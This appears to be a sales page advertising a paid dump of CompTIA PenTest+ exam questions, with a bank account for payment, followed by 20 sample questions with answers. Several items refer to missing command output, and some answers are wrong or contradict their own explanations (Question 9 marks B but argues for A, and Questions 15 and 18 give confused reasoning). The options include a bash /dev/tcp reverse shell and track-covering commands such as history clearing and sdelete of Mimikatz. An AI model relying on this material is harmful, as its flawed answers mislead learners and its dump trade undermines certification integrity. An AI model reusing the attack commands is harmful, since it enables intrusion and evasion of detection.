Study material for the CompTIA PenTest+ (PT0-002) Information Security Certification
Number of questions: 256 Q/A, updated every 2 months. Many people have already passed, most recently within the last 2 weeks!
The dump has been fixed by the community (dumps sold by other vendors have quite a few wrong answers, and with the "choose the best answer" scoring style, different answers may be worth different scores).
In particular, there is a Telegram support group for difficult questions and free PenTest+ video training in English (watch online).
Price: 2000 K, discounted by 1000 K if you register and pay today, leaving 1000 K. The material will be sent by email within a maximum of 4 – 8 working hours.
In addition, a dump for the Test Engine running on PC or Android is available for 750 K. Dump + Test Engine for 1500 K.
Payment and ordering information:
Bank: HDBANK
Account number: 999990914433338
Account holder: Nguyen Thi Quynh Vien. Note: please write in the transfer memo: mua vuadump penplus + phone number
Contact: Messenger VuaDump
About the CompTIA PenTest+ Information Security Certification
CompTIA PenTest+ is an information security certification specialising in pentesting (penetration testing). Offered by CompTIA, PenTest+ is regarded as one of the leading certifications for pentesters and security professionals.
The CompTIA PenTest+ certification focuses on the skills and knowledge needed to perform safe and reliable penetration tests on network environments. It helps pentesters understand and apply pentesting methods, tools and techniques to discover and exploit security vulnerabilities in a system.
Below are some highlights and benefits of CompTIA PenTest+:
- Broad and deep: PenTest+ provides a wide knowledge framework of pentesting methods and technologies, including tool selection, vulnerability analysis and exploitation, and reporting of test results.
- Hands-on and guided: The certification focuses on the practical execution of penetration tests and provides specific guidance on using tools and techniques.
- International recognition: CompTIA PenTest+ is a widely recognised certification with global value. This increases career opportunities and opens doors for you in the international labour market.
- Career support: The PenTest+ certification can help you build trust and credibility in the pentesting field. It is an important tool for proving your ability to employers and clients.
When identifying a top certification for pentesters, CompTIA PenTest+ is highly regarded in the information security industry. Earning this certification will help you master the knowledge and skills needed to perform high-quality penetration tests and become a professional pentester.
Some CompTIA PenTest+ demo exam questions
Question 1
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. chmod u+x script.sh
B. chmod u+e script.sh
C. chmod o+e script.sh
D. chmod o+x script.sh
Answer: A
The correct answer is A.
The chmod command is used to change the permissions of a file or directory. In this question, the objective is to allow the file owner to execute the shell script. The u in u+x specifies that the permission change should apply to the user who owns the file, and the +x specifies that the execute permission should be added. Therefore, chmod u+x script.sh will allow the file owner to execute the script.
Option B, chmod u+e script.sh, is incorrect as there is no permission flag e.
Option C, chmod o+e script.sh, is incorrect as o specifies the permission for “others” and not the owner of the file.
Option D, chmod o+x script.sh, is incorrect as o specifies the permission for “others” and not the owner of the file. Additionally, adding execute permission to others can pose a security risk, as anyone with access to the system could potentially execute the script.
Question 2
A penetration tester gains access to a system, establishes persistence, and then runs the following commands:
Which of the following actions is the tester MOST likely performing?
A. Redirecting Bash history to /dev/null
B. Making a copy of the user’s Bash history for further enumeration
C. Covering tracks by clearing the Bash history
D. Making decoy files on the system to confuse incident responders
Answer: C
The correct answer is C. The penetration tester is likely covering their tracks by clearing the Bash history. By running the command “history -c”, the tester is clearing the Bash history on the system, which can help to hide their actions and prevent incident responders from seeing what commands were executed. This is a common technique used by attackers to cover their tracks and make it more difficult for defenders to detect and investigate their activities.
Question 3
A compliance-based penetration test is primarily concerned with:
A. obtaining PII from the protected network.
B. bypassing protection on edge devices.
C. determining the efficacy of a specific set of security standards.
D. obtaining specific information from the protected network.
Answer: C
A compliance-based penetration test is primarily concerned with determining the efficacy of a specific set of security standards. The objective of this type of penetration testing is to evaluate the organization’s compliance with a specific set of security standards or regulations, such as HIPAA or PCI DSS, rather than identifying specific vulnerabilities or exploiting them.
Question 4
A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.
Which of the following would the tester MOST likely describe as a benefit of the framework?
A. Understanding the tactics of a security intrusion can help disrupt them.
B. Scripts that are part of the framework can be imported directly into SIEM tools.
C. The methodology can be used to estimate the cost of an incident better.
D. The framework is static and ensures stability of a security program over time.
Answer: A
A benefit of the MITRE ATT&CK framework is that understanding the tactics of a security intrusion can help disrupt them. The MITRE ATT&CK framework is a comprehensive knowledge base of adversary tactics and techniques based on real-world observations of cyber attacks. It is used to develop threat models and conduct threat assessments, and can be used to help organizations identify potential weaknesses in their defenses and implement more effective security measures.
Reference:
https://attack.mitre.org/
Question 5
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities
Answer: AC
The OWASP Top 10 is a list of the most critical risks of web applications, defined in order of importance. It is a widely recognized standard in web application security and is used by organizations as a guideline for developing secure web applications. The OWASP Top 10 identifies the most common and severe vulnerabilities that threaten web application security, such as injection flaws, cross-site scripting (XSS), and broken authentication and session management.
Reference:
https://www.synopsys.com/glossary/what-is-owasp-top-10.html
Question 6
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:
Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. Edit the discovered file with one line of code for remote callback.
B. Download .pl files and look for usernames and passwords.
C. Edit the smb.conf file and upload it to the server.
D. Download the smb.conf file and look at configurations.
Answer: C
This is because the smb.conf file contains configuration settings for the Samba server, and editing it can potentially allow an attacker to gain access to the system. Uploading a modified smb.conf file that contains a backdoor or other malicious code could give an attacker access to the system when the file is executed.
Question 7
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?
A. Whether sensitive client data is publicly accessible
B. Whether the connection between the cloud and the client is secure
C. Whether the client’s employees are trained properly to use the platform
D. Whether the cloud applications were developed using a secure SDLC
Answer: A
The tester should verify whether sensitive client data is publicly accessible first. This is because the security of hosted data is critical for any cloud service provider. If sensitive client data is publicly accessible, it could lead to a data breach, which would have severe consequences for the company and its clients.
Question 8
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. nc 10.10.51.50 9891 < exploit
B. powershell -exec bypass -f \\10.10.51.50\9891
C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
D. wget 10.10.51.50:9891/exploit
Answer: D
The correct command to download the file named exploit from the SimpleHTTPServer running on 10.10.51.50:9891 is D. wget 10.10.51.50:9891/exploit. This command will use the wget utility to download the exploit file from the specified location. Option A uses netcat (nc) to connect to the SimpleHTTPServer, but does not specify the filename to download. Option B uses PowerShell to execute a file from the specified location, but does not download it. Option C uses bash to create a reverse shell to the specified IP address and port, but does not download the file.
Question 9
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM "apache" /F
Answer: B
The code snippet provided in the image is a Bash script that sets up a backdoor by creating a new user with root privileges and modifying the sudoers file to allow that user to execute commands as root without entering a password.
The question asks which command the penetration tester should run post-engagement, that is, after the engagement has been completed, which most likely refers to cleanup or covering tracks.
Out of the given answer choices, option A, “grep -v apache ~/bash_history > ~/.bash_history,” is the most appropriate command for post-engagement cleanup. This command will remove any instances of the word “apache” from the current user’s bash history, effectively removing any evidence of the exploit being used.
Option B, “rm -rf /tmp/apache,” is not recommended because it will only remove the temporary directory created during the exploit, and not the user or sudoers modifications made by the script.
Option C, “chmod 600 /tmp/apache,” is also not recommended because it only changes the permissions of the temporary directory created during the exploit and does not address the more significant modifications made by the script.
Option D, “taskkill /IM ‘apache’ /F,” is not a valid command in Bash and appears to be a command for Windows operating systems.
Question 10
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
A. Executive summary of the penetration-testing methods used
B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe typecasting operations
Answer: D
The answer is D. Code context for instances of unsafe typecasting operations. When writing a final report of a static application-security test, it is important to include detailed information about specific vulnerabilities that were found, including the code context in which they were found. This information is particularly important for the intended audience of application developers because it can help them to understand the vulnerabilities and take steps to address them. While an executive summary of the penetration-testing methods used may be included in the report, it is not the most important information for the intended audience. A bill of materials including supplies, subcontracts, and costs incurred during assessment is not relevant to a static application-security test. While quantitative impact assessments given a successful software compromise may be useful information, they are not the most important information for the intended audience of application developers.
Question 11
SIMULATION
You are a penetration tester reviewing a client’s website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer: See explanation below.
Step 1: Generate Certificate Signing Request
Step 2: Submit CSR to the CA
Step 3: Remove certificate from the server
Step 4: Install re-issued certificate on the server
Question 12
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.
Which of the following tools can help the tester achieve this goal?
A. Metasploit
B. Hydra
C. SET
D. WPScan
Answer: C
C. SET (Social Engineering Toolkit) is a tool that can help penetration testers evaluate the security awareness level of the employees by simulating phishing attacks, credential harvesting, and other social engineering techniques.
Question 13
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
A. Unsupported operating systems
B. Susceptibility to DDoS attacks
C. Inability to network
D. The existence of default passwords
Answer: D
D. Default passwords are the most common vulnerability associated with IoT devices that are directly connected to the Internet. Many IoT devices come with pre-configured, easily guessable default passwords that can be exploited by attackers.
Question 14
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server that the tester compromised?
A. To remove hash-cracking registry entries
B. To remove the tester-created Mimikatz account
C. To remove tools from the server
D. To remove a reverse shell from the system
Answer: C
C. The command sdelete mimikatz.* is used to remove tools from the server. In this case, the penetration tester is removing the Mimikatz tool, which is commonly used to extract credentials from Windows systems.
Question 15
A penetration tester is scanning a corporate lab network for potentially vulnerable services.
Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
A. nmap 192.168.1.1-5 -PU22-25,80
B. nmap 192.168.1.1-5 -PA22-25,80
C. nmap 192.168.1.1-5 -PS22-25,80
D. nmap 192.168.1.1-5 -Ss22-25,80
Answer: B
B. The -PA option in the Nmap command specifies that the scan should use a TCP ACK packet to determine if a port is open or not. This method can be used to identify potential vulnerable services that are listening on a port but not responding to normal TCP SYN packets. The specified ports in this case are 22-25, and 80. So, option B is correct.
Question 16
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:
However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?
A. The HTTP port is not open on the firewall.
B. The tester did not run sudo before the command.
C. The web server is using HTTPS instead of HTTP.
D. This URI returned a server error.
Answer: C
The web server is using HTTPS instead of HTTP.
The output from the command indicates that the server is listening on port 3000, but it does not specify whether the service is using HTTP or HTTPS. Since the tester tried to browse the URL with HTTP but received a blank page, it is likely that the server is using HTTPS instead. Therefore, the tester would need to use “https://” instead of “http://” in the URL to access the page.
Question 17
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address.
Which of the following MOST likely describes what happened?
A. The penetration tester was testing the wrong assets.
B. The planning process failed to ensure all teams were notified.
C. The client was not ready for the assessment to start.
D. The penetration tester had incorrect contact information.
Answer: B
The correct answer is B. The planning process failed to ensure all teams were notified. Explanation: Sinkholing is a technique used to block traffic from a specific IP address or network by redirecting it to a non-existent or harmless destination. In this scenario, the SOC has used sinkholing to block the penetration tester’s traffic, which is a common defensive measure. The reason for the sinkholing is that the planning process failed to ensure all teams were notified, which resulted in the SOC not being aware of the penetration testing activity.
Question 18
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?
A. Uncover potential criminal activity based on the evidence gathered.
B. Identify all the vulnerabilities in the environment.
C. Limit invasiveness based on scope.
D. Maintain confidentiality of the findings.
Answer: C
The correct answer is C. Limit invasiveness based on scope. Explanation: By running WPScan and SQLmap against open ports on web servers and databases, the penetration tester is attempting to limit invasiveness based on scope. These tools are specifically designed to identify vulnerabilities in web applications and databases and are less likely to cause damage to the systems than other types of attacks.
Question 19
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago.
In which of the following places should the penetration tester look FIRST for the employees’ numbers?
A. Web archive
B. GitHub
C. File metadata
D. Underground forums
Answer: A
The correct answer is A. Web archive. Explanation: If the penetration tester has discovered that the phone catalog was published on the company’s website a few months ago, the web archive is the best place to look for the phone numbers. The web archive stores snapshots of websites at different points in time, which means that it is possible to retrieve information that is no longer available on the live website.
Question 20
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.
Which of the following would BEST support this task?
A. Run nmap with the -O, -p22, and -sC options set against the target.
B. Run nmap with the -sV and -p22 options set against the target.
C. Run nmap with the --script vulners option set against the target.
D. Run nmap with the -sA option set against the target.
Answer: C
The correct answer is C. Run nmap with the --script vulners option set against the target. Explanation: The --script vulners option in Nmap is used to search for vulnerabilities in a target’s software using the CVE database. This option is specifically designed to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.
To study for and take CompTIA PenTest+, knowledge equivalent to CompTIA Security+ is required.
Study material for the CompTIA Security+ (SY0-601) Information Security Certification